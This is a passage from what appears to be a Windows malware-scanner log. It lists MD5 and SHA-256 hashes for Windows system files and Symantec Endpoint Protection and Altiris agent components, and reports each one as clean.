15:34:00.0050 0x04bc  C:\Windows\System32\certcli.dll - ok
15:34:00.0052 0x04bc  [ 1D626FE2E13C1CE49CA0136CFF214E93, 4F02DD92045CF244979FFD074B2BDE6925A909227A474C60DCABE4384D916218 ] C:\Windows\System32\spool\prtprocs\x64\winprint.dll
15:34:00.0052 0x04bc  C:\Windows\System32\spool\prtprocs\x64\winprint.dll - ok
15:34:00.0054 0x04bc  [ C8FADC40946F89913BBA87A11CC1C2C9, 7C318135C063996F38C21E098F25FFE89B0FCBE06A5193B12717AF69167F45F6 ] C:\Program Files\Altiris\Dagent\DagentConfig.exe
15:34:00.0054 0x04bc  C:\Program Files\Altiris\Dagent\DagentConfig.exe - ok
15:34:00.0056 0x04bc  [ 4ED40796C26D83F9C5727238CE2BB68C, 4873DBC69776B6E013B1AA5E54FD67D788D53509EEF642F0A365AE4419A896EE ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LicenseMan64.dll
15:34:00.0056 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LicenseMan64.dll - ok
15:34:00.0058 0x04bc  [ 6B174167E5F313609D578B03BF697D0A, B8F8EDB15FF8A9DEB43F97C29E88FEE730D1A1807918ED1E8F95456328B3D90C ] C:\Program Files\Altiris\Dagent\dagentui.exe
15:34:00.0058 0x04bc  C:\Program Files\Altiris\Dagent\dagentui.exe - ok
15:34:00.0060 0x04bc  [ 9028D1621C43DF8DFBD1C76860412A11, A1D48D9B33180BDE50D2FA9BB07E9520B7B7788C39B3AABB4A06AE4B1AACA755 ] C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_a4d3b9377117c3df\comctl32.dll
15:34:00.0060 0x04bc  C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_a4d3b9377117c3df\comctl32.dll - ok
15:34:00.0062 0x04bc  [ 263E9A047D17CD50BAA9D3C02910D18D, F526648358AD121001D2776E0ACC333EC4AC168CA07B40A3D3C06C5CE6A361C3 ] C:\Windows\System32\oledlg.dll
15:34:00.0062 0x04bc  C:\Windows\System32\oledlg.dll - ok
15:34:00.0064 0x04bc  [ A5C91A5124521FEE610E36A9821FE54D, 83F040C3E72C18ACC43B326B749F60578E179CAAE6FBFDCAC4672758C2EC1C21 ] C:\Program Files\Altiris\Dagent\dagentui_EN.dll
15:34:00.0064 0x04bc  C:\Program Files\Altiris\Dagent\dagentui_EN.dll - ok
15:34:00.0066 0x04bc  [ 2D7820AD8094B627F629B233694A9B6A, 2883377CB67EBAFEF8FB5F1AF9793B067000F4C5BDF12F85BC3BB402A1988E60 ] C:\Program Files\Altiris\Dagent\config.dll
15:34:00.0066 0x04bc  C:\Program Files\Altiris\Dagent\config.dll - ok
15:34:00.0068 0x04bc  [ 011F0B067E47612F57C4ECE377D9C9DF, 69FA7230B889DA09CD4DDA0D38CA1D418E48605535D7E1125050F0B89919DFBE ] C:\Windows\System32\activeds.dll
15:34:00.0068 0x04bc  C:\Windows\System32\activeds.dll - ok
15:34:00.0069 0x04bc  [ 67CF11E00D026A5C0C88EA5F84D501E5, 5081A87466116232CF07F58229967B6C0CD3738B64A56EFC6BB3EBDA62E378F6 ] C:\Windows\System32\win32spl.dll
15:34:00.0070 0x04bc  C:\Windows\System32\win32spl.dll - ok
15:34:00.0071 0x04bc  [ DDDDF82B2B12AE414DC001CAC5E2F6A9, 60DD64C3D4A728C376DD5400080E82E40CB86A0E60EE8665899CE756137D80C7 ] C:\Windows\System32\inetpp.dll
15:34:00.0071 0x04bc  C:\Windows\System32\inetpp.dll - ok
15:34:00.0073 0x04bc  [ 44B8304DF957FF872EF7332417B36E3F, 1DE1CF0A9F1F095EFA9104CF11366C2D8D9080C430DDD39CA7D98F8FE8D7A4B2 ] C:\Program Files\Altiris\Dagent\autoupdate.dll
15:34:00.0073 0x04bc  C:\Program Files\Altiris\Dagent\autoupdate.dll - ok
15:34:00.0075 0x04bc  [ 07AD88DF9EF73215458867EFC1BFFE9E, 8C659B6F31111C09448B68889623886658C96467E7E5C95C1714E18AD3924463 ] C:\Windows\System32\wbem\wmiprov.dll
15:34:00.0075 0x04bc  C:\Windows\System32\wbem\wmiprov.dll - ok
15:34:00.0077 0x04bc  [ 7DB5AA22A8A8E5C2D335F44853C1F6DE, A734A20357026C42950394682A52CBC3AF956D09F1949E1B4E95467E999BC428 ] C:\Windows\System32\wbemcomn.dll
15:34:00.0077 0x04bc  C:\Windows\System32\wbemcomn.dll - ok
15:34:00.0079 0x04bc  [ 263B26106606A010CF877472B535E4BB, 43ECE89E428D2BB34244894BEBA1B946B0767649D15B1C715223E4E471A9E504 ] C:\Windows\System32\CertEnroll.dll
15:34:00.0079 0x04bc  C:\Windows\System32\CertEnroll.dll - ok
15:34:00.0081 0x04bc  [ 55B267E39DE069A1304BDC2A374C3C20, C18DA0916EDCCD561C00A9CA30EEC56236A99ACE5E9FC5926A0D64CD8E255183 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\vpmseceRes.dll
15:34:00.0081 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\vpmseceRes.dll - ok
15:34:00.0083 0x04bc  [ 1B471AC631781640442CF28EA48BCF6C, 76D256C90A20E15A538D4197AD22E697ECD1BA0E879B01E4C9CEBB797D943286 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Trident.dll
15:34:00.0083 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Trident.dll - ok
15:34:00.0085 0x04bc  [ 32EB0E79D4AC5726B674CECD8D7E2DE5, 5E1D98D0C93B080FD79740CAF9C9AD5A358C093ED81F8C99CA14787277AA116B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SgHI.dll
15:34:00.0085 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SgHI.dll - ok
15:34:00.0087 0x04bc  [ 65E2A559CA1138DED55F9853F2E56AA7, EB355213FE1284A6A15FF2B953660F4F518755240D22D4A8E082AE17A397CC6A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\sfConfig.dll
15:34:00.0087 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\sfConfig.dll - ok
15:34:00.0089 0x04bc  [ 51C347D9F7469EADB3D2DB81BE3DE8B6, BF0FD0B05E6931BAD873BE62CCAD5CDF0F2356B90D340F1DD9B5B2A80476499F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\tseConfig.dll
15:34:00.0089 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\tseConfig.dll - ok
15:34:00.0091 0x04bc  [ 4DAA5BDF018D281D1969E091B9707C5E, 961CF1F049F5C53B70B47C5757E5278319382C8B723153BAAFE24B2EB5C2412F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SpNet.dll
15:34:00.0091 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SpNet.dll - ok
15:34:00.0093 0x04bc  [ C8E0E3B268369D4CBC201D370FBCF794, 1748E96CAE07B8358A8DF729D589FAA6498F9D95905A81F4213BE1AC78BEF4BE ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\NacManager.plg
15:34:00.0093 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\NacManager.plg - ok
15:34:00.0095 0x04bc  [ 357BE883C5236BFC7341CB9E82308908, 4DDB697FD9B7C516CF99D73C8799EA35BB97E2431216CD7C1045F17B06109FBF ] C:\Windows\System32\wlanapi.dll
15:34:00.0095 0x04bc  C:\Windows\System32\wlanapi.dll - ok
15:34:00.0097 0x04bc  [ 24974C9CBE2375D20C562E7F7D052E37, 580974E825D78E32D0F7B693E8885FC065C5874C59127FAF55EC8535D2863185 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\TseConfigRes.dll
15:34:00.0097 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\TseConfigRes.dll - ok
15:34:00.0099 0x04bc  [ 7F1B4C6FF3B85F9ADF74055187B8A22C, CC95DA5662638AACBE9643DCB236464C2C2095A8D5CDC8A747045870BE9D0E7D ] C:\Windows\System32\wlanutil.dll
15:34:00.0099 0x04bc  C:\Windows\System32\wlanutil.dll - ok
15:34:00.0101 0x04bc  [ 8A5B7F2002ED4E27B7858F4D7447F76D, 63287550FA0FF3AF9CAFA34C18E882466BAD0718D8A7CB104823BDEE47D34B3D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AtpiMan.plg
15:34:00.0101 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AtpiMan.plg - ok
15:34:00.0103 0x04bc  [ C1724EED36812CF6ECAC3C89C6982FF9, B9FB117B64F0E9F77471E231C90F90FD12AE75013495252E95ABAFD05BE87840 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AVMan.plg
15:34:00.0103 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AVMan.plg - ok
15:34:00.0105 0x04bc  [ 3390B39A631F2C06FF4EC6D0DCDA4C13, 4CC61E0B7AF47D64E8029D9E6D7461602C3C32515ACFB6663164EF748E3E48A2 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\BashMan.plg
15:34:00.0105 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\BashMan.plg - ok
15:34:00.0107 0x04bc  [ 27844B7991788D8CEB21F174CCFE2A78, 5F3CC789312126BB39CFC08246053B4F41DD0B95D678D6567481D42230B10342 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CidsMan.plg
15:34:00.0107 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CidsMan.plg - ok
15:34:00.0109 0x04bc  [ DAD6DD6CDB45B729DB43EDC95626E70D, 5B72B67BF4524121F940A749EDD086B6EE581FBA36B1A063ED7CE85DAA7E6993 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CommonMan.plg
15:34:00.0109 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CommonMan.plg - ok
15:34:00.0111 0x04bc  [ 23CBB7269291881FBA6394A27FE2FE6E, 6C70BD8A9768F15C74220666757433F318CE20EF66F09DC558F8959462F4EEDC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DevMan.plg
15:34:00.0111 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DevMan.plg - ok
15:34:00.0113 0x04bc  [ 910DF898D3FA73AF7130903489E5810E, ACC896B27DBD7E9E0CE005F81842F0CE54C8DAC5EA3FF389C76CE8A88722FFB5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\GUProxy.plg
15:34:00.0113 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\GUProxy.plg - ok
15:34:00.0115 0x04bc  [ A0091A2BF474FCAF84D1239131C4C189, 99E5008A94DBA16172075A1AB4C80A10CCEB562EDD5BA05C727FAF017C8FFF63 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LocalRep.plg
15:34:00.0115 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LocalRep.plg - ok
15:34:00.0117 0x04bc  [ 97613C9CEDDEFD520CF710E161BA662E, F2D55580C3370E5ADF42B294578D3A41B87927DEF436A825C3160B328869C156 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LUMan.plg
15:34:00.0117 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LUMan.plg - ok
15:34:00.0119 0x04bc  [ 9FF39B289371A0995AAE882030D596ED, 6FD65644E86B6B1B37743892A9F535F2B24328B3BDC56B8FC9B941238560C21A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileMgrMan.plg
15:34:00.0119 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileMgrMan.plg - ok
15:34:00.0121 0x04bc  [ FABBF33DAF3BE14162AD4EB03C28CF0B, 9ADD0089FE969895DF1BB2D9105F177B1DE2EF6C4BF1B0E3C80B028B7D0F4EC3 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RebootMgrMan.plg
15:34:00.0121 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RebootMgrMan.plg - ok
15:34:00.0123 0x04bc  [ 5D640CBCA1E05B365AC5DD4DBC266747, B2A870F9A330D711C6DFAC3B40608CC14F956B9A263DC184296286432F68F71D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RepMgtMan.plg
15:34:00.0123 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RepMgtMan.plg - ok
15:34:00.0126 0x04bc  [ 8C40B91207906900C87B268D0A495305, 7D41FDA66E9F6352637C582300E9E71E4EA92554B365F8B47560EFE1DA9F5453 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SfMan.plg
15:34:00.0126 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SfMan.plg - ok
15:34:00.0128 0x04bc  [ 52B18FE8FCFFD755B998729C1394DA57, 4040007DA467D9FFB9A2FE7532F53430C044DCFF9EFF39BF00126885B12E6E79 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SubmissionsMan.plg
15:34:00.0128 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SubmissionsMan.plg - ok
15:34:00.0130 0x04bc  [ FEB93F5912AAF3DA7B973BF171DD3451, 7FC57DF21BD731059B2CB64A05386D1F3605575CE73D63B3E77ADB82DE868C74 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AvPluginImpl.dll
15:34:00.0130 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AvPluginImpl.dll - ok
15:34:00.0132 0x04bc  [ D623399743B1C4660EE09C11F17274CB, 02265FC559AC572CF396AE6F55C986C028A189D71C02137018C9A759DD2495D4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileManagement.dll
15:34:00.0132 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileManagement.dll - ok
15:34:00.0134 0x04bc  [ F7521FCC1B360A61721CC8716F0C2A4B, DA5B7E3BA68F199EAFA45D89665DA393D6E0B9797ABAB759AF00156CD37FEA18 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\AVManRes.dll
15:34:00.0134 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\AVManRes.dll - ok
15:34:00.0136 0x04bc  [ CF6850A72BEB4845A3BFFB3F5E8014B2, ABB2907DB16929D4A12E0551C01DD731762B1A4CFEF36B734734F3ECDD630A38 ] C:\Windows\System32\pdh.dll
15:34:00.0136 0x04bc  C:\Windows\System32\pdh.dll - ok
15:34:00.0138 0x04bc  [ 5A55E3E6F53592F8170623DEFA2B7954, B524543192E78A2C97D3EC9AA0CFCBBAA308439D3A33F9A1F4EDFBD3181D7919 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\atl100.dll
15:34:00.0138 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\atl100.dll - ok
15:34:00.0140 0x04bc  [ 8F62847AE17EB99E62611613E79D0BF6, E62A79A3CB9BC8E32565365AC11A6E626BABF04CF9C3908B6410458D4AC8EC2D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\GUProxyRes.dll
15:34:00.0140 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\GUProxyRes.dll - ok
15:34:00.0142 0x04bc  [ 77A9A70EEC89FF03BC8B223F9D1EBA57, 7A4267BAF71069D905DAACD217E4BA773B3D8DCFFBFCA9BE475B7A0B91FB87BB ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LUManRes.dll
15:34:00.0142 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LUManRes.dll - ok
15:34:00.0144 0x04bc  [ EA189476AC47070ADB754DCA79D5BA26, 7EF78CABF2164D0D5F6F5D2AB1078D23C4C14C3F7D4D194DF983465BC0DB8E19 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LueEimProxy.dll
15:34:00.0144 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\LueEimProxy.dll - ok
15:34:00.0146 0x04bc  [ 8F34EC8996677AF1C9EDC95F35A51A2B, C80FC4A539F1272ECA29CC74799DF0F2E9FA987531CF45048FFC8CAC298036D6 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SfManRes.dll
15:34:00.0146 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SfManRes.dll - ok
15:34:00.0148 0x04bc  [ C3B4C43C33B55CB4CF56AA686BE69350, D403F277B0758B5B2817DB2747F8925604D29973FCD4305A6B86B5934C8A85BC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SEPPolicyMonitor.dll
15:34:00.0148 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SEPPolicyMonitor.dll - ok
15:34:00.0150 0x04bc  [ F082D6902AC2D316D8D8C82F62EF6E80, E84CB749FC283383AD199F0C5F9CEA8FE005C19D3430333E663066937470C6B2 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileManagementClient.dll
15:34:00.0150 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ProfileManagementClient.dll - ok
15:34:00.0152 0x04bc  [ 92A358FDE21F023D9140BABAAF36F0D3, A2CDB569C37A9670B0134482D573336AA2CF7A60E70049C6C960DA10B6FF644D ] C:\Windows\System32\wbem\unsecapp.exe
15:34:00.0152 0x04bc  C:\Windows\System32\wbem\unsecapp.exe - ok
15:34:00.0154 0x04bc  [ 612D62566C617682782FCFDD27D70EAB, 5F09B625F73C7E959E854A7319E2BFCDC0E05A00D53D6AF03221656426A500B0 ] C:\Windows\System32\wbem\NCProv.dll
15:34:00.0154 0x04bc  C:\Windows\System32\wbem\NCProv.dll - ok
15:34:00.0156 0x04bc  [ 8988C09D41D580B973F5BACB206E6BC6, 121444EB2268F6C67118FE0BF0D653BED42D611AF71D0CC8EBB81D3A302EFB82 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\DevManRes.dll
15:34:00.0156 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\DevManRes.dll - ok
15:34:00.0158 0x04bc  [ 667A7BE1A0087B73DB51C99BDBDA925B, 8F26208AE7AF1FBC8770CF4D496A9BF0522DAAEB6376974A507AA2B980325EA2 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AtpiEimProxy.dll
15:34:00.0158 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\AtpiEimProxy.dll - ok
15:34:00.0160 0x04bc  [ 781D63AF66DB69039B2A2C7F93DA8CBE, 19A0712DFD14C09A35B78A0EE5DEABB24F83C752C8234EE8CF8D730795B46719 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\BashEimProxy.dll
15:34:00.0160 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\BashEimProxy.dll - ok
15:34:00.0162 0x04bc  [ DBBE7F344E4EF230022407A62F0BE932, 0B3F57CA9DBAE712E26D7206EDFE403982225FA667548B1578E5AD0F828FEC01 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CidsEimProxy.dll
15:34:00.0162 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\CidsEimProxy.dll - ok
15:34:00.0164 0x04bc  [ 921F320527F81DA4D9E785D791F2E03F, 2EE90D9F80408CC39A276424ADF15182AF51466A2314747EA9C80C54B04231DC ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\CIDSManRes.dll
15:34:00.0164 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\CIDSManRes.dll - ok
15:34:00.0166 0x04bc  [ CAE2889013B39B6655BB492A9734DC2B, 6C1E69455C8152A885EB13B75E0654EA0A71D8A9EBC70844FD7C299B0B7FC109 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RebootMgrEimProxy.dll
15:34:00.0166 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RebootMgrEimProxy.dll - ok
15:34:00.0168 0x04bc  [ E6C56D6AFB3FF58F4A6A6E4FA7984E21, 83B89104633702AA434C4C84816B6EA3B925A816F9D59489131AF8400822C141 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\srtsp64.dll
15:34:00.0168 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\srtsp64.dll - ok
15:34:00.0170 0x04bc  [ E032F788C9B6FC618F5578481D4B808A, 58127D6FD64B62CA7D4A1723E1647616B51C01CB0C4362988E29934F1050A7EA ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccSvc.dll
15:34:00.0170 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccSvc.dll - ok
15:34:00.0173 0x04bc  [ 6FA11664D8A2732A97980F515507944C, 0948BE8AA59C35067C87588944280210453E477D8CFC1B5849EB93F9FC4E0778 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RebootMgrEim.dll
15:34:00.0173 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RebootMgrEim.dll - ok
15:34:00.0175 0x04bc  [ B6631A90124A7DEFA0C58BCF320663C7, B18499056BE6E1FD827268A1EA87E5F2724731C53051EB0F700D92045A6B708B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\RebootMgrEimRes.dll
15:34:00.0175 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\RebootMgrEimRes.dll - ok
15:34:00.0177 0x04bc  [ F5289AE77ED18EF61E6F6D8D2FE0CABC, 88EB51FC7911DA9092698C16930367DF2BE9209F875CD4891EF4B629AEE6D825 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RepMgtEimProxy.dll
15:34:00.0177 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\RepMgtEimProxy.dll - ok
15:34:00.0179 0x04bc  [ A28A293DC9D0A74E144BA74A13FA922A, B312A0367FCE14C7D2870A85D829AA9B2343320C2D364607E64F5CFDDCFAA54F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SubmissionsEimProxy.dll
15:34:00.0179 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SubmissionsEimProxy.dll - ok
15:34:00.0181 0x04bc  [ 9D118D70AD6E682D1419AC7DF53483CE, 626653D8426E922B5C47F51B6A3206040BC86231AEA4639CDB4EC01D7D92EC2C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\NacManagerRes.dll
15:34:00.0181 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\NacManagerRes.dll - ok
15:34:00.0183 0x04bc  [ 4420488D25A5947C8791DF10C204FA81, 70141D8FDD5C803BAB04CD7A6DDF4C22E3A87A83CBEB072EF86BBABBBBDAA194 ] C:\Windows\System32\winver.exe
15:34:00.0183 0x04bc  C:\Windows\System32\winver.exe - ok
15:34:00.0185 0x04bc  [ E3B81E35C12D53056B70D1A01A496139, FC0503EF752A99D2BCFF8A1724883323F5CD2E692C74EF3235139C40D8CA5183 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DefUtDCD.dll
15:34:00.0185 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\DefUtDCD.dll - ok
15:34:00.0187 0x04bc  [ B791809944958913621687891EE549FB, 42236D517453ED8451A2089F5078BB4C31E87A782B59506C6F3E602008FDCDD2 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SgHIRes.dll
15:34:00.0187 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SgHIRes.dll - ok
15:34:00.0189 0x04bc  [ D46E1203EF60D79FF30BD67A5CFA6429, 0441AF70862F75C68674ED4F1182AF15EFE234C845CE868AF9256E33DE289425 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SpNetRes.dll
15:34:00.0189 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SpNetRes.dll - ok
15:34:00.0191 0x04bc  [ 4B181960543ADF494B71BE8A9ED6FE40, D73AB02DD8E920EE0FFE6C0CAFDBCA7C0892846EE2FC65C9B3DCBB48B822E9A5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLinkSymInterfaceProxy.dll
15:34:00.0191 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyLinkSymInterfaceProxy.dll - ok
15:34:00.0193 0x04bc  [ 927B7EF3A5EC6D4256C899AC020FF4AB, 459E62F48E0B5B88A589F2242547C20DEEA005125C51ADF42D586875ECCE3296 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Tse.dll
15:34:00.0193 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Tse.dll - ok
15:34:00.0195 0x04bc  [ D47B2CD081FD740F8C31F45A51879C24, 4C11E32476ADF3FF09BC3ED18994698150698113D3147DE0C8ACA9031BF96599 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\IdsTrafficPipe.dll
15:34:00.0195 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\IdsTrafficPipe.dll - ok
15:34:00.0197 0x04bc  [ 50D8B522B6E49DD5C2F21C1A41C764CE, 043C0DB4FA45C17F9E7F798ACC356982921C9F576700224E5C9E5DC25EF2236F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\PSSensor.dll
15:34:00.0197 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\PSSensor.dll - ok
15:34:00.0199 0x04bc  [ 6C8C628BA546AAC093A9BCD54C03064E, 18DC188797473E63D84F0F039FE29132D90D8BC1E0C24FF64EF710B4AC3115C9 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\tfman.dll
15:34:00.0199 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\tfman.dll - ok
